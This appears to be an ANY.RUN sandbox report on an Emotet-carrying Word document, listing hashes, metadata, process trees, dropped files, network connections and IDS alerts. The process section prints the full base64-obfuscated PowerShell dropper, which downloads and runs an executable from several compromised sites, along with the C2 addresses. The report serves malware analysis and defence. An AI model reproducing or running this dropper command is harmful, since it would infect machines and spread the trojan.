analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

0299500-102019-03464473.doc

Full analysis: https://app.any.run/tasks/6ac2982c-f81e-4fa3-ac9a-8c8a6022b558
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: October 14, 2019, 13:27:52
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
opendir
emotet
loader
emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Administrator, Subject: alarm, Author: Bernadine Erdman, Keywords: black, Comments: vortals, Template: Normal.dotm, Last Saved By: Kevon Mertz, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Oct 14 07:26:00 2019, Last Saved Time/Date: Mon Oct 14 07:26:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 176, Security: 0
MD5:

5C5B15FE5E0FA02818B55B414F235BE8

SHA1:

A947DFFB19CE8A74A6532472406CFCE7F6E7CDFB

SHA256:

8A29A5E93475CBD533260056742186AACBFF486A9EC602EFE43225A3BEF0BBB9

SSDEEP:

6144:CaxM8dtPWuMrbwFtr6/DVokOe89/uvbuoh:CaTdtPWuMq6/KeyM

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Emotet process was detected

      • 798.exe (PID: 1248)
    • Application was dropped or rewritten from another process

      • msptermsizes.exe (PID: 1788)
      • 798.exe (PID: 1248)
      • 798.exe (PID: 2772)
      • msptermsizes.exe (PID: 1732)
    • Connects to CnC server

      • msptermsizes.exe (PID: 1732)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 1740)
  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 1740)
    • Creates files in the user directory

      • powershell.exe (PID: 1740)
    • PowerShell script executed

      • powershell.exe (PID: 1740)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 1740)
      • 798.exe (PID: 1248)
    • Starts itself from another location

      • 798.exe (PID: 1248)
    • Connects to server without host name

      • msptermsizes.exe (PID: 1732)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2156)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2156)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Administrator
Subject: alarm
Author: Bernadine Erdman
Keywords: black
Comments: vortals
Template: Normal.dotm
LastModifiedBy: Kevon Mertz
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:10:14 06:26:00
ModifyDate: 2019:10:14 06:26:00
Pages: 1
Words: 30
Characters: 176
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Rolfson - Nolan
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 205
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Kessler
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
6
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 798.exe no specs #EMOTET 798.exe msptermsizes.exe no specs msptermsizes.exe

Process information

PID
CMD
Path
Indicators
Parent process
2156"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\0299500-102019-03464473.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1740powershell -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABhADAAeABhADIAZQBkADIAOQA1ADEANgA4ADIAMgBiAD0AJwBhADAAeAAzADYANwA2ADUAZQBjAGMAMgA4ACcAOwAkAGEAMAB4AGMAZABjADQAZgA0ADAAYQBhAGUAZQAxACAAPQAgACcANwA5ADgAJwA7ACQAYQAwAHgAYQBkADEANQA0ADkANwAyADMANwAwADAAYQA9ACcAYQAwAHgAMgBjADgAOQBmADYANwA2AGIAYQAzAGUANgBjACcAOwAkAGEAMAB4ADgANABhADMAMAA5AGIAMgA0ADYANABhADEAMQBhAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABhADAAeABjAGQAYwA0AGYANAAwAGEAYQBlAGUAMQArACcALgBlAHgAZQAnADsAJABhADAAeABmAGMAYgBjAGIAMQBkADcAZAAzADAAMwA9ACcAYQAwAHgANAA0ADYANwBmAGIANwAwADkAZgAyADYAJwA7ACQAYQAwAHgANgA3ADIAZABlAGUAZAAxAGEANwA3AGIAZgBmAD0ALgAoACcAbgBlAHcALQBvACcAKwAnAGIAagAnACsAJwBlAGMAdAAnACkAIABuAGUAVAAuAFcARQBCAGMAbABpAEUAbgB0ADsAJABhADAAeAAxAGEAZAA0AGIANQA2ADcAMwA4ADIAMAA0AD0AJwBoAHQAdABwADoALwAvAGMAbwBhAHMAdABhAGwAdABoAGUAcgBhAHAAeQAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AYwBoAHoAMAB1ADkAMwA0ADcALwAqAGgAdAB0AHAAOgAvAC8AYgByAGEAbgBkAHMAbwBmAHoAYQBtAGIAaQBhAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwAwAHEAcwBzAGcAMwA4ADQAMQAvACoAaAB0AHQAcABzADoALwAvAGIAdQBzAGUAYQBjAHkAYwBsAGUALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBnAGsAMAA1ADYALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBiAG8AawBzAGwAaQBuAGsALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHAAawA5ADcAMAA5ADYALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGgAbwBsAGwAeQB3AG8AbwBkAGMAbAB1AGIALgB4AHkAegAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHUAYQA2ADcAdgAzADIAOAA4AC8AJwAuACIAUwBwAEwAYABJAFQAIgAoACcAKgAnACkAOwAkAGEAMAB4ADAAYgAwADYAZQA1ADEANABlAGEAOQAxAGYAMAA9ACcAYQAwAHgANgA0ADYANQA1AGYANwBlAGMAOQBhAGUAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGEAMAB4ADIAYgA1ADQAOAAyAGYAYgBiAGEAIABpAG4AIAAkAGEAMAB4ADEAYQBkADQAYgA1ADYANwAzADgAMgAwADQAKQB7AHQAcgB5AHsAJABhADAAeAA2ADcAMgBkAGUAZQBkADEAYQA3ADcAYgBmAGYALgAiAEQAbwBgAHcAbgBgAEwAbwBgAEEAZABmAEkATABlACIAKAAkAGEAMAB4ADIAYgA1ADQAOAAyAGYAYgBiAGEALAAgACQAYQAwAHgAOAA0AGEAMwAwADkAYgAyADQANgA0AGEAMQAxAGEAKQA7ACQAYQAwAHgAOQA0AGIAMgA2ADIAMwBhADUAYQA0AD0AJwBhADAAeABlAGMANwA0AGQAOABlAGYAMAA0ADEAMwAxAGEANAAnADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQB0AC0ASQB0AGUAbQAnACkAIAAkAGEAMAB4ADgANABhADMAMAA5AGIAMgA0ADYANABhADEAMQBhACkALgAiAEwAYABlAG4ARwBgAFQASAAiACAALQBnAGUAIAAzADMANwA5ADgAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBgAFQAYQBSAHQAIgAoACQAYQAwAHgAOAA0AGEAMwAwADkAYgAyADQANgA0AGEAMQAxAGEAKQA7ACQAYQAwAHgAMQAxADEANAA2AGMAOQA5ADgAYgBlAGMAMQA9ACcAYQAwAHgAYgBmAGQAYwAzADkANQAzAGEANABhAGQANQBlADEAJwA7AGIAcgBlAGEAawA7ACQAYQAwAHgAZgAxAGYAMwBhADkAOABmAGQAYgA1AGQAPQAnAGEAMAB4AGYANwA3ADEAYwA3ADcAOABiAGQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAYQAwAHgAYgBlADQAYQA2AGMAZQBkADAANgA2ADEANgA9ACcAYQAwAHgANgBlAGYANgBhADAAYgBlAGUANwBmACcAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2772"C:\Users\admin\798.exe" C:\Users\admin\798.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Description:
DirectoryBrowse MFC Application
Exit code:
0
Version:
1, 0, 0, 1
1248--6b88d874C:\Users\admin\798.exe
798.exe
User:
admin
Integrity Level:
MEDIUM
Description:
DirectoryBrowse MFC Application
Exit code:
0
Version:
1, 0, 0, 1
1788"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe798.exe
User:
admin
Integrity Level:
MEDIUM
Description:
DirectoryBrowse MFC Application
Exit code:
0
Version:
1, 0, 0, 1
1732--f91b2738C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe
msptermsizes.exe
User:
admin
Integrity Level:
MEDIUM
Description:
DirectoryBrowse MFC Application
Version:
1, 0, 0, 1
Total events
2 224
Read events
1 411
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
15

Dropped files

PID
Process
Filename
Type
2156WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA5EF.tmp.cvr
MD5:
SHA256:
1740powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\534OJQMMTUFQPK0HRBH5.temp
MD5:
SHA256:
2156WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\652B54A8.wmfwmf
MD5:2D935F823080B9FF895732490B9BFF8C
SHA256:D2F1EE5B3E8B3F893978D4FC0E81B0204E92A022F6FE887748006756F6E23987
2156WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:55A8161E22A484442CA963CFBC475D7C
SHA256:A7B27CBD0C3D575543AA17D94EBEB3970347608FEA4019FC710B7EAA21042D76
2156WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:45822EE62FC571A3151895E367644231
SHA256:EB3C643FA978D554A4FC475FB2EC2D439467CBEED53546B5218462C2B3EC2CB5
1740powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39b495.TMPbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
2156WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AB563C89.wmfwmf
MD5:EDB9DAF80D798631309421C0F0AF770A
SHA256:C01D9240067AA3E654DA293BCC9BC8BA30F5734369E0E28D4D725D826FDCDFEB
2156WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A6C0987F.wmfwmf
MD5:2AB9CEFBC845519D97348E6D2AE5E817
SHA256:DC9CAAF84273277B5E93682D4FCBE0627CD5791771F752A3740FDA1C9B7376FD
2156WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\350DD00A.wmfwmf
MD5:35D2398E5B057FC67D138FCD011720F5
SHA256:CFE9417B0C666A6E8085A569154D1A9FB62EC5625EA825D6BA70B6317A7B0618
2156WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$99500-102019-03464473.docpgc
MD5:95D22EF720589539B7F23278ABCB043E
SHA256:F03448A264CC32F48C9B6221BEFF013EECC963C1487D4AE67232940FEBF5432A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1732
msptermsizes.exe
POST
110.36.234.146:80
http://110.36.234.146/json/usbccid/
PK
malicious
1740
powershell.exe
GET
200
50.28.1.57:80
http://coastaltherapy.com/wp-includes/chz0u9347/
US
executable
544 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
110.36.234.146:80
National WiMAX/IMS environment
PK
malicious
1740
powershell.exe
50.28.1.57:80
coastaltherapy.com
Liquid Web, L.L.C
US
suspicious

DNS requests

Domain
IP
Reputation
coastaltherapy.com
  • 50.28.1.57
suspicious

Threats

PID
Process
Class
Message
1740
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
1740
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
1740
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
1732
msptermsizes.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 2
No debug info